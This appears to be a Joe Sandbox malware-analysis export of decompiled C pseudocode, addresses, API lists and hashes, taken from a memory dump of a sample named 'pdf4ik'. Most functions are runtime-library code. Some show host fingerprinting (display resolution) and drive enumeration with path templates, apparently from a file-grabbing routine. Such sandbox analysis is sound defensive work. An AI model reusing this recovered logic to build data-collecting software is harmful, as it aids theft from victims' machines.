                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                        • String ID:
                                        • API String ID: 1602911419-0
                                        • Opcode ID: d2109489d8ce1be5902a3cd14dc67849a615787bf4b3d0e8e79f1dad8a7ef5c2
                                        • Instruction ID: d5345870c93b4f6fefe7384fd5a23d4a941eeaf8850c290256aa605783525c40
                                        • Opcode Fuzzy Hash: d2109489d8ce1be5902a3cd14dc67849a615787bf4b3d0e8e79f1dad8a7ef5c2
                                        • Instruction Fuzzy Hash: 6E11DA75C01209EFDF00DFA4D494B9D7BB0FF19314F10906DE916AB650DB389916AF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB48A1 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 81%
                                        			E29DB48A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x29dd1d10);
				E29DB5A50(__ebx, __edi, __esi);
				_t31 = E29DB524B(__ebx, __edx, _t35);
				_t15 =  *0x29dd5b98; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E29DB60C0(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x29dd5aa0; // 0x2bab1678
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x29dd5678;
								if(__eflags != 0) {
									E29DADFA6(_t33);
								}
							}
						}
						_t21 =  *0x29dd5aa0; // 0x2bab1678
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x29dd5aa0; // 0x2bab1678
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E29DB493C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E29DB3393(_t29, _t38);
				}
				return E29DB5A95(_t33);
			}









                                        0x29db48a1
                                        0x29db48a1
                                        0x29db48a1
                                        0x29db48a1
                                        0x29db48a3
                                        0x29db48a8
                                        0x29db48b2
                                        0x29db48b4
                                        0x29db48bc
                                        0x29db48dd
                                        0x29db48e3
                                        0x29db48e7
                                        0x29db48ea
                                        0x29db48ed
                                        0x29db48f3
                                        0x29db48f5
                                        0x29db48f7
                                        0x29db4900
                                        0x29db4902
                                        0x29db4904
                                        0x29db490a
                                        0x29db490d
                                        0x29db4912
                                        0x29db490a
                                        0x29db4902
                                        0x29db4913
                                        0x29db4918
                                        0x29db491b
                                        0x29db4921
                                        0x29db4925
                                        0x29db4925
                                        0x29db492b
                                        0x29db4932
                                        0x29db48c4
                                        0x29db48c4
                                        0x29db48c4
                                        0x29db48c7
                                        0x29db48c9
                                        0x29db48cb
                                        0x29db48cd
                                        0x29db48d2
                                        0x29db48da

                                        APIs
                                        • __getptd.LIBCMT ref: 29DB48AD
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __amsg_exit.LIBCMT ref: 29DB48CD
                                        • __lock.LIBCMT ref: 29DB48DD
                                        • InterlockedDecrement.KERNEL32(?), ref: 29DB48FA
                                        • _free.LIBCMT ref: 29DB490D
                                        • InterlockedIncrement.KERNEL32(2BAB1678), ref: 29DB4925
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 3470314060-0
                                        • Opcode ID: 44d22823ae71a2f76bb4887e4e4c63cc6e3c4e87668f591d4a0131dbea24d294
                                        • Instruction ID: 507f676958cae5fe345c17e7bf08028f337d94a173c2fc68d77f5c6417d7777c
                                        • Opcode Fuzzy Hash: 44d22823ae71a2f76bb4887e4e4c63cc6e3c4e87668f591d4a0131dbea24d294
                                        • Instruction Fuzzy Hash: 0201A536901621ABDA25EF51905474D7360BF25751F40910DD40BBFE84CB247653FBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D95540 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D95540(void* __eax, signed int __ecx, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				intOrPtr* _t20;
				char* _t25;
				signed int _t29;
				intOrPtr* _t30;
				void* _t37;
				signed int _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t51;
				intOrPtr* _t56;

				_t40 = __ecx;
				_t37 = __eax;
				_t56 = __ecx;
				if(__eax == 0) {
					L12:
					_t5 = _t56 + 0x10; // 0x68d88b02
					_t18 =  *_t5;
					_t45 = _a4;
					if((_t40 | 0xffffffff) - _t18 <= _t45) {
						_t18 = E29DAD440("string too long");
					}
					if(_t45 == 0) {
						L30:
						return _t56;
					} else {
						_t51 = _t18 + _t45;
						if(_t51 > 0xfffffffe) {
							_t18 = E29DAD440("string too long");
						}
						_t8 = _t56 + 0x14; // 0x29dcfb4c
						_t43 =  *_t8;
						if(_t43 >= _t51) {
							if(_t51 != 0) {
								goto L19;
							} else {
								 *((intOrPtr*)(_t56 + 0x10)) = _t51;
								if(_t43 < 0x10) {
									_t25 = _t56;
									 *_t25 = 0;
									return _t25;
								} else {
									 *((char*)( *_t56)) = 0;
									return _t56;
								}
							}
						} else {
							E29D89750(_t56, _t51, _t18);
							_t45 = _a4;
							if(_t51 == 0) {
								L29:
								goto L30;
							} else {
								L19:
								if( *(_t56 + 0x14) < 0x10) {
									_t20 = _t56;
								} else {
									_t20 =  *_t56;
								}
								_t12 = _t56 + 0x10; // 0x68d88b02
								E29DB0010( *_t12 + _t20, _t37, _t45);
								 *((intOrPtr*)(_t56 + 0x10)) = _t51;
								if( *(_t56 + 0x14) < 0x10) {
									 *((char*)(_t56 + _t51)) = 0;
									goto L29;
								} else {
									 *((char*)( *_t56 + _t51)) = 0;
									return _t56;
								}
							}
						}
					}
				} else {
					_t1 = _t56 + 0x14; // 0x29dcfb4c
					_t40 =  *_t1;
					if(_t40 < 0x10) {
						_t29 = __ecx;
					} else {
						_t29 =  *__ecx;
					}
					if(_t37 < _t29) {
						goto L12;
					} else {
						if(_t40 < 0x10) {
							_t30 = _t56;
						} else {
							_t30 =  *_t56;
						}
						_t2 = _t56 + 0x10; // 0x68d88b02
						if( *_t2 + _t30 <= _t37) {
							goto L12;
						} else {
							if(_t40 < 0x10) {
								return E29D89A20(_a4, _t40, _t56, _t56, _t37 - _t56);
							} else {
								return E29D89A20(_a4, _t40, _t56, _t56, _t37 -  *_t56);
							}
						}
					}
				}
			}















                                        0x29d95540
                                        0x29d95544
                                        0x29d95547
                                        0x29d9554b
                                        0x29d955a0
                                        0x29d955a0
                                        0x29d955a0
                                        0x29d955a3
                                        0x29d955ad
                                        0x29d955b4
                                        0x29d955b4
                                        0x29d955bb
                                        0x29d9564c
                                        0x29d95651
                                        0x29d955c1
                                        0x29d955c2
                                        0x29d955c8
                                        0x29d955cf
                                        0x29d955cf
                                        0x29d955d4
                                        0x29d955d4
                                        0x29d955d9
                                        0x29d955f7
                                        0x00000000
                                        0x29d955f9
                                        0x29d955f9
                                        0x29d955ff
                                        0x29d95610
                                        0x29d95613
                                        0x29d95618
                                        0x29d95601
                                        0x29d95604
                                        0x29d9560c
                                        0x29d9560c
                                        0x29d955ff
                                        0x29d955db
                                        0x29d955df
                                        0x29d955e4
                                        0x29d955e9
                                        0x29d9564b
                                        0x00000000
                                        0x29d955eb
                                        0x29d955eb
                                        0x29d955ef
                                        0x29d9561b
                                        0x29d955f1
                                        0x29d955f1
                                        0x29d955f1
                                        0x29d9561e
                                        0x29d95625
                                        0x29d95631
                                        0x29d95634
                                        0x29d95647
                                        0x00000000
                                        0x29d95636
                                        0x29d95638
                                        0x29d95642
                                        0x29d95642
                                        0x29d95634
                                        0x29d955e9
                                        0x29d955d9
                                        0x29d9554d
                                        0x29d9554d
                                        0x29d9554d
                                        0x29d95553
                                        0x29d95559
                                        0x29d95555
                                        0x29d95555
                                        0x29d95555
                                        0x29d9555d
                                        0x00000000
                                        0x29d9555f
                                        0x29d95562
                                        0x29d95568
                                        0x29d95564
                                        0x29d95564
                                        0x29d95564
                                        0x29d9556a
                                        0x29d95571
                                        0x00000000
                                        0x29d95573
                                        0x29d95576
                                        0x29d9559d
                                        0x29d95578
                                        0x29d95589
                                        0x29d95589
                                        0x29d95576
                                        0x29d95571
                                        0x29d9555d

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D955B4
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D955CF
                                        • _memmove.LIBCMT ref: 29D95625
                                          • Part of subcall function 29D89A20: std::_Xinvalid_argument.LIBCPMT ref: 29D89A38
                                          • Part of subcall function 29D89A20: std::_Xinvalid_argument.LIBCPMT ref: 29D89A56
                                          • Part of subcall function 29D89A20: std::_Xinvalid_argument.LIBCPMT ref: 29D89A71
                                          • Part of subcall function 29D89A20: _memmove.LIBCMT ref: 29D89AD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: \Desktop\$string too long
                                        • API String ID: 2168136238-3537509313
                                        • Opcode ID: 4c0e4ba009df682ff9db3f9b0cb6869ad973abb81a5541ae916b0ae39426d716
                                        • Instruction ID: e898a4eb85fcafdb9b28256ed2e4053e3f2328ded136d70654fb528840cd01a3
                                        • Opcode Fuzzy Hash: 4c0e4ba009df682ff9db3f9b0cb6869ad973abb81a5541ae916b0ae39426d716
                                        • Instruction Fuzzy Hash: D931EA723206109BE324DE6CD8C095AF7EAEFA1660720463EE9468FE52D771D84293A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA35C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 111COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29DA35C0(void* __eflags, intOrPtr _a4) {
				struct HWND__* _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v32;
				char _v48;
				intOrPtr _v56;
				char _v60;
				char _v76;
				intOrPtr _v84;
				char _v88;
				char _v104;
				intOrPtr _v112;
				char _v132;
				intOrPtr _v136;
				struct HWND__* _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				int _t40;
				int _t41;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t63;
				void* _t77;
				struct HDC__* _t79;
				void* _t82;
				signed int _t83;
				void* _t84;
				void* _t88;
				void* _t90;

				_t90 = __eflags;
				_push(0xffffffff);
				_push(E29DC2EF0);
				_push( *[fs:0x0]);
				_t35 =  *0x29dd5664; // 0xd9555f04
				_t36 = _t35 ^ _t83;
				_v20 = _t36;
				_push(_t36);
				 *[fs:0x0] =  &_v16;
				_v136 = _a4;
				_v140 = 0;
				_t79 = CreateDCA("DISPLAY", 0, 0, 0);
				_t40 = GetDeviceCaps(_t79, 8);
				_t41 = GetDeviceCaps(_t79, 0xa);
				ReleaseDC(0, _t79);
				_t43 = E29DA4720( &_v132, _t90, _t41);
				_v8 = 0;
				_t44 = E29DA4720( &_v104, _t90, _t40);
				_v8 = 1;
				_t46 = E29D89930(0x29dcd617,  &_v76, _t44);
				_v8 = 2;
				_t48 = E29D95410("x",  &_v48, _t46);
				_t76 = _v136;
				_v8 = 3;
				E29D89980(_t43, _t48, _v136);
				_t88 = _t84 - 0x80 + 0xc;
				if(_v28 >= 0x10) {
					_push(_v48);
					E29DADF3B();
					_t88 = _t88 + 4;
				}
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				if(_v56 >= 0x10) {
					_t73 = _v76;
					_push(_v76);
					E29DADF3B();
					_t88 = _t88 + 4;
				}
				_v56 = 0xf;
				_v60 = 0;
				_v76 = 0;
				if(_v84 >= 0x10) {
					_push(_v104);
					E29DADF3B();
					_t88 = _t88 + 4;
				}
				_v84 = 0xf;
				_v88 = 0;
				_v104 = 0;
				if(_v112 >= 0x10) {
					_push(_v132);
					E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t77);
				_pop(_t82);
				_pop(_t63);
				return E29DADF46(_t76, _t63, _v20 ^ _t83, _t73, _t77, _t82);
			}






































                                        0x29da35c0
                                        0x29da35c3
                                        0x29da35c5
                                        0x29da35d0
                                        0x29da35d7
                                        0x29da35dc
                                        0x29da35de
                                        0x29da35e4
                                        0x29da35e8
                                        0x29da35fc
                                        0x29da3602
                                        0x29da3612
                                        0x29da3617
                                        0x29da3622
                                        0x29da362d
                                        0x29da3637
                                        0x29da3642
                                        0x29da3649
                                        0x29da3657
                                        0x29da365b
                                        0x29da366c
                                        0x29da3670
                                        0x29da367a
                                        0x29da3683
                                        0x29da3687
                                        0x29da3691
                                        0x29da3697
                                        0x29da369c
                                        0x29da369d
                                        0x29da36a2
                                        0x29da36a2
                                        0x29da36a7
                                        0x29da36ae
                                        0x29da36b1
                                        0x29da36b7
                                        0x29da36b9
                                        0x29da36bc
                                        0x29da36bd
                                        0x29da36c2
                                        0x29da36c2
                                        0x29da36c5
                                        0x29da36cc
                                        0x29da36cf
                                        0x29da36d5
                                        0x29da36da
                                        0x29da36db
                                        0x29da36e0
                                        0x29da36e0
                                        0x29da36e3
                                        0x29da36ea
                                        0x29da36ed
                                        0x29da36f3
                                        0x29da36f8
                                        0x29da36f9
                                        0x29da36fe
                                        0x29da3706
                                        0x29da370e
                                        0x29da370f
                                        0x29da3710
                                        0x29da371e

                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 29DA360C
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 29DA3617
                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 29DA3622
                                        • ReleaseDC.USER32(00000000,00000000), ref: 29DA362D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CapsDevice$CreateRelease
                                        • String ID: DISPLAY
                                        • API String ID: 2571409768-865373369
                                        • Opcode ID: 36050988b741c09172eb5d5f36ab17e687bbe6b49b0519f37d701a4c1641dcf1
                                        • Instruction ID: 141a7e3ef3cc4d74b7a99503707a5210e9a70073965c81c9b326b3d2679df8a1
                                        • Opcode Fuzzy Hash: 36050988b741c09172eb5d5f36ab17e687bbe6b49b0519f37d701a4c1641dcf1
                                        • Instruction Fuzzy Hash: D641C3B2D01388AFDB00DFA8D885BDEFBB9AF14700F14806DE509A7741DB745A05DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D894C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D894C0(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t18;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr* _t50;

				_t34 = _a8;
				_t50 = __ecx;
				_t36 = _a4;
				_t42 =  *((intOrPtr*)(_t36 + 0x10));
				if(_t42 < _t34) {
					E29DAD48D("invalid string position");
				}
				_t15 = _a12;
				_t43 = _t42 - _t34;
				if(_t15 < _t43) {
					_t43 = _t15;
				}
				if(_t50 != _t36) {
					if(_t43 > 0xfffffffe) {
						E29DAD440("string too long");
					}
					_t16 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t16 >= _t43) {
						if(_t43 != 0) {
							goto L10;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
							if(_t16 < 0x10) {
								_t24 = _t50;
								 *_t24 = 0;
								return _t24;
							} else {
								 *((char*)( *_t50)) = 0;
								return _t50;
							}
						}
					} else {
						E29D89750(_t50, _t43,  *((intOrPtr*)(_t50 + 0x10)));
						_t36 = _a4;
						if(_t43 == 0) {
							L22:
							return _t50;
						} else {
							L10:
							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
								_t36 =  *_t36;
							}
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								_t18 = _t50;
							} else {
								_t18 =  *_t50;
							}
							E29DB0010(_t18, _t36 + _t34, _t43);
							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t43)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t50 + _t43)) = 0;
								return _t50;
							}
						}
					}
				} else {
					E29D896C0(_t50, _t43 + _t34, 0xffffffff);
					E29D896C0(_t50, 0, _t34);
					return _t50;
				}
			}












                                        0x29d894c4
                                        0x29d894c8
                                        0x29d894ca
                                        0x29d894ce
                                        0x29d894d3
                                        0x29d894da
                                        0x29d894da
                                        0x29d894df
                                        0x29d894e2
                                        0x29d894e6
                                        0x29d894e8
                                        0x29d894e8
                                        0x29d894ec
                                        0x29d89510
                                        0x29d89517
                                        0x29d89517
                                        0x29d8951c
                                        0x29d89521
                                        0x29d8954d
                                        0x00000000
                                        0x29d8954f
                                        0x29d8954f
                                        0x29d89555
                                        0x29d89566
                                        0x29d89569
                                        0x29d8956e
                                        0x29d89557
                                        0x29d8955a
                                        0x29d89562
                                        0x29d89562
                                        0x29d89555
                                        0x29d89523
                                        0x29d8952a
                                        0x29d8952f
                                        0x29d89534
                                        0x29d8959e
                                        0x29d895a4
                                        0x29d89536
                                        0x29d89536
                                        0x29d8953e
                                        0x29d89540
                                        0x29d89540
                                        0x29d89545
                                        0x29d89571
                                        0x29d89547
                                        0x29d89547
                                        0x29d89547
                                        0x29d89578
                                        0x29d89584
                                        0x29d89587
                                        0x29d8959a
                                        0x00000000
                                        0x29d89589
                                        0x29d8958b
                                        0x29d89595
                                        0x29d89595
                                        0x29d89587
                                        0x29d89534
                                        0x29d894ee
                                        0x29d894f5
                                        0x29d894ff
                                        0x29d8950a
                                        0x29d8950a

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89517
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • _memmove.LIBCMT ref: 29D89578
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                        • String ID: invalid string position$string too long
                                        • API String ID: 1615890066-4289949731
                                        • Opcode ID: f85b973faba8fa22c227bea5915aa70686654762f6faf1e19b7269c6be5e2281
                                        • Instruction ID: bf23852c6651c7b7e0478cdead934888254aa70d96661d9f5e8671a3b84e9fbf
                                        • Opcode Fuzzy Hash: f85b973faba8fa22c227bea5915aa70686654762f6faf1e19b7269c6be5e2281
                                        • Instruction Fuzzy Hash: 5431D7333042109BD7208E5CEC84A5EF3A9FFB1664F20066FF182CBA52C671D94393A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D90FA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E29D90FA9(void* __edi) {
				int _t45;
				void* _t49;
				int _t54;
				signed int _t59;
				CHAR* _t70;
				void* _t75;
				signed int _t76;
				void* _t79;
				signed int _t80;
				signed int _t84;
				void* _t98;
				signed int* _t99;
				void* _t100;
				CHAR* _t101;
				CHAR* _t103;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t108;
				void* _t110;
				signed int _t111;
				void* _t113;

				_t98 = __edi;
				do {
					_t101 =  *(_t111 - 0x1948);
					_t45 = GetDriveTypeA(_t101);
					if( *((intOrPtr*)(_t111 - 0x195c)) == 0) {
						L5:
						 *0x29dd85cc(_t111 - 0x950, _t111 - 0x3f8);
						_t76 = StrStrA(_t111 - 0x950, "%DRIVE_FIXED%");
						_t49 = _t111 - 0x950;
						__eflags = _t76;
						if(__eflags != 0) {
							_t110 = _t76 - _t49;
							 *0x29dd8498(0x29dd8830, _t49, _t110);
							_t80 = _t76 + 0xd;
							__eflags = _t80;
							_t12 = _t110 + 0x29dd8830; // 0x29dd8830
							_t70 = _t12;
							 *_t70 = 0;
							wsprintfA(_t70, "%s%s",  *(_t111 - 0x1948), _t80);
							_t113 = _t113 + 0x10;
							_t49 = 0x29dd8830;
						}
						_push(_t49);
						_push(_t111 - 0x950);
					} else {
						_t117 = _t45 - 2;
						if(_t45 != 2) {
							goto L5;
						} else {
							 *0x29dd85cc(_t111 - 0x950, _t111 - 0x3f8);
							_t75 = E29DA4650(_t111 - 0x950, "%DRIVE_REMOVABLE%", _t101);
							_t113 = _t113 + 8;
							_push(_t75);
							_push(_t111 - 0x950);
							goto L8;
						}
					}
					L8:
					 *0x29dd85cc();
					_t84 =  *(_t111 - 0x1958);
					E29D90820( *((intOrPtr*)(_t111 - 0x194c)), _t84, _t111 - 0x950, _t98,  *((intOrPtr*)(_t111 + 0x1c)), _t117, _t111 - 0x950,  *(_t111 - 0x1954),  *((intOrPtr*)(_t111 + 0x18)),  *((intOrPtr*)(_t111 + 0xc)),  *((intOrPtr*)(_t111 - 0x1960)));
					_t103 =  *(_t111 - 0x1948);
					_t113 = _t113 + 0x14;
					_t54 = lstrlenA(_t103);
					 *(_t111 - 0x1948) =  &(_t103[_t54 + 1]);
				} while (_t103[_t54 + 1] != 0);
				_t99 =  *(_t111 - 0x1954);
				if(_t99 != 0) {
					__eflags =  *_t99 - 2;
					if( *_t99 == 2) {
						_t104 = _t99[1];
						__eflags =  *((char*)(_t104 + 0x2c));
						if( *((char*)(_t104 + 0x2c)) == 0) {
							E29DAD160(_t104, 0x10000, _t84);
						}
						_t96 =  *(_t104 + 0x20);
						asm("sbb eax, eax");
						_t59 = ( ~( *(_t104 + 0x20)) & 0xfffe0000) + 0x20000;
						__eflags = _t59;
						 *((char*)(_t104 + 0x2c)) = 1;
						_t105 =  *(_t104 + 0x18);
						 *0x29dd8814 = _t59;
					} else {
						_t105 =  *(_t111 - 0x1950);
						_t96 =  *(_t111 - 0x1950);
						 *0x29dd8814 = 0x80000;
					}
				} else {
					_t96 = 0;
					_t105 = 0;
					 *0x29dd8814 = 0x10000;
				}
				_t60 =  *(_t111 - 0x1950);
				if(_t60 != 0) {
					__eflags =  *_t60 - 2;
					if( *_t60 == 2) {
						_t84 =  *(_t60 + 4);
						 *0x29dd8814 = E29DAC840(_t84, _t96, _t111 - 0x1508, _t105, 3);
					} else {
						 *0x29dd8814 = 0x80000;
					}
				} else {
					 *0x29dd8814 = 0x10000;
				}
				if(_t99 == 0) {
					 *0x29dd8814 = 0x10000;
				} else {
					_t60 =  *_t99;
					if((_t84 & 0xffffff00 | _t60 == 0x00000001) == 0) {
						__eflags = _t60 - 2;
						if(_t60 == 2) {
							_t107 = _t99[1];
							 *0x29dd8814 = E29DAC130(_t107);
							__eflags = _t107;
							if(_t107 != 0) {
								E29DAD2E0(_t107);
							}
							L33:
							_push(_t99);
							_t60 = E29DADF3B();
							L34:
							 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0xc));
							_pop(_t100);
							_pop(_t106);
							_pop(_t79);
							return E29DADF46(_t60, _t79,  *(_t111 - 0x10) ^ _t111, _t96, _t100, _t106);
						}
						 *0x29dd8814 = 0x80000;
						goto L34;
					}
					if(_t60 == 1) {
						_t108 = _t99[1];
						 *0x29dd86b0 = E29D8E390(_t108);
						__eflags = _t108;
						if(_t108 != 0) {
							E29D8E4A0(_t108);
						}
						goto L33;
					}
					 *0x29dd86b0 = 0x80000;
				}
			}


























                                        0x29d90fa9
                                        0x29d90fb0
                                        0x29d90fb0
                                        0x29d90fb7
                                        0x29d90fc4
                                        0x29d90ffd
                                        0x29d9100b
                                        0x29d91023
                                        0x29d91025
                                        0x29d9102b
                                        0x29d9102d
                                        0x29d91031
                                        0x29d9103c
                                        0x29d91048
                                        0x29d91048
                                        0x29d9104d
                                        0x29d9104d
                                        0x29d91059
                                        0x29d9105c
                                        0x29d91062
                                        0x29d91065
                                        0x29d91065
                                        0x29d9106a
                                        0x29d91071
                                        0x29d90fc6
                                        0x29d90fc6
                                        0x29d90fc9
                                        0x00000000
                                        0x29d90fcb
                                        0x29d90fd9
                                        0x29d90feb
                                        0x29d90ff0
                                        0x29d90ff3
                                        0x29d90ffa
                                        0x00000000
                                        0x29d90ffa
                                        0x29d90fc9
                                        0x29d91072
                                        0x29d91072
                                        0x29d91097
                                        0x29d910a4
                                        0x29d910a9
                                        0x29d910af
                                        0x29d910b3
                                        0x29d910c2
                                        0x29d910c2
                                        0x29d91100
                                        0x29d9110d
                                        0x29d9111b
                                        0x29d9111e
                                        0x29d91138
                                        0x29d9113b
                                        0x29d9113f
                                        0x29d91143
                                        0x29d91143
                                        0x29d91148
                                        0x29d9114f
                                        0x29d91156
                                        0x29d91156
                                        0x29d9115b
                                        0x29d9115f
                                        0x29d91162
                                        0x29d91120
                                        0x29d91120
                                        0x29d91126
                                        0x29d9112c
                                        0x29d9112c
                                        0x29d9110f
                                        0x29d9110f
                                        0x29d91111
                                        0x29d91113
                                        0x29d91113
                                        0x29d91167
                                        0x29d9116f
                                        0x29d91179
                                        0x29d9117c
                                        0x29d9118a
                                        0x29d9119c
                                        0x29d9117e
                                        0x29d9117e
                                        0x29d9117e
                                        0x29d91171
                                        0x29d91171
                                        0x29d91171
                                        0x29d911a3
                                        0x29d911da
                                        0x29d911a5
                                        0x29d911a5
                                        0x29d911af
                                        0x29d911e2
                                        0x29d911e5
                                        0x29d911f3
                                        0x29d911fb
                                        0x29d91200
                                        0x29d91202
                                        0x29d91204
                                        0x29d91204
                                        0x29d91209
                                        0x29d91209
                                        0x29d9120a
                                        0x29d91212
                                        0x29d91215
                                        0x29d9121d
                                        0x29d9121e
                                        0x29d9121f
                                        0x29d9122d
                                        0x29d9122d
                                        0x29d911e7
                                        0x00000000
                                        0x29d911e7
                                        0x29d911b4
                                        0x29d911c2
                                        0x29d911ca
                                        0x29d911cf
                                        0x29d911d1
                                        0x29d911d3
                                        0x29d911d3
                                        0x00000000
                                        0x29d911d1
                                        0x29d911b6
                                        0x29d911b6

                                        APIs
                                        • GetDriveTypeA.KERNEL32(00000000), ref: 29D90FB7
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90FD9
                                          • Part of subcall function 29DA4650: StrStrA.SHLWAPI(?,?,000F4240,?,?,29D909A9,%APPDATA%,?), ref: 29DA465C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9100B
                                        • StrStrA.SHLWAPI(?,%DRIVE_FIXED%), ref: 29D9101D
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D9103C
                                        • wsprintfA.USER32 ref: 29D9105C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D91072
                                        • lstrlenA.KERNEL32(?), ref: 29D910B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$DriveTypelstrcpynlstrlenwsprintf
                                        • String ID: %DRIVE_REMOVABLE%
                                        • API String ID: 216543645-3528989341
                                        • Opcode ID: 1f2cd741bd46edb0a6568c0afb66886be392defd6ca10b09adeab8ecf3879691
                                        • Instruction ID: 50e2d26df1c8550058a285655352eba62ccb6677f76fe933c3e01221ee81b541
